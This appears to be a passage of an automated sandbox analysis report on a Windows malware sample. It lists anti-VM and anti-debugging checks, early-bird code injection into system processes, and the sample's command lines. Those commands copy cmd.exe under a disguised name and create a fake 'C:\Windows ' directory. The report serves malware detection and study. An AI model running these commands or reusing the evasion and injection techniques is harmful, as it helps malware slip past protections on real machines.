                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320F7E2 Sleep,ExitProcess,11_2_0320F7E2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8F7E2 Sleep,ExitProcess,21_2_02E8F7E2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_0321A7D9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,21_2_02E9A7D9
                Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 4.9 %
                Source: C:\Users\Public\alpha.pifAPI coverage: 7.7 %
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 4.9 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02C95908
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00050207
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_0005589A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,7_2_00063E66
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00054EC1
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,7_2_0004532E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0321C322
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0320C388
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0320928E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_032096A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0320BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_03219B86
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03207877 FindFirstFileW,FindNextFileW,11_2_03207877
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_03208847
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0324E8F9 FindFirstFileExA,11_2_0324E8F9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0320BD72
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_0005589A
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00050207
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00063E66
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00054EC1
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_0004532E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_02E8928E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,21_2_02E8C388
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,21_2_02E9C322
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_02E896A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_02E99B86
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_02E8BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02ECE8F9 FindFirstFileExA,21_2_02ECE8F9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E87877 FindFirstFileW,FindNextFileW,21_2_02E87877
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,21_2_02E88847
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_02E8BD72
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_03207CD2
                Source: Amcache.hve.14.drBinary or memory string: VMware
                Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.14.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1611613314.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: xpha.pif, 00000010.00000002.1713024647.0000000002590000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 00000013.00000002.1713335088.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 0000001F.00000002.1804537208.0000000000618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.14.drBinary or memory string: vmci.sys
                Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.14.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.14.drBinary or memory string: VMware20,1
                Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\nft438A5fN.exeAPI call chain: ExitProcess graph end nodegraph_0-72744

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02CAF744
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\SndVol.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\SndVol.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320F3FE LdrInitializeThunk,11_2_0320F3FE
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00062E37 IsDebuggerPresent,7_2_00062E37
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02CA894C
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D5A8E5 mov eax, dword ptr fs:[00000030h]0_2_02D5A8E5
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0006C1FA mov eax, dword ptr fs:[00000030h]7_2_0006C1FA
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03243355 mov eax, dword ptr fs:[00000030h]11_2_03243355
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006C1FA mov eax, dword ptr fs:[00000030h]15_2_0006C1FA
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EC3355 mov eax, dword ptr fs:[00000030h]21_2_02EC3355
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0004A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW,7_2_0004A9D4
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00056EC0 SetUnhandledExceptionFilter,7_2_00056EC0
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00056B40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0323503C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0323BB71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03234BD8 SetUnhandledExceptionFilter,11_2_03234BD8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03234A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_03234A8A
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00056EC0 SetUnhandledExceptionFilter,15_2_00056EC0
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00056B40
                Source: C:\Users\Public\xpha.pifCode function: 16_2_000F3600 SetUnhandledExceptionFilter,16_2_000F3600
                Source: C:\Users\Public\xpha.pifCode function: 16_2_000F3470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000F3470
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_02EB503C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_02EB4A8A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB4BD8 SetUnhandledExceptionFilter,21_2_02EB4BD8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EBBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_02EBBB71

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\nft438A5fN.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3200000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E80000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3290000 protect: page execute and read and write
                Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\nft438A5fN.exeThread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_03212132
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe21_2_02E92132
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03219662 mouse_event,11_2_03219662
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D4C246 cpuid 0_2_02D4C246
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02C95ACC
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: GetLocaleInfoA,0_2_02C9A7C4
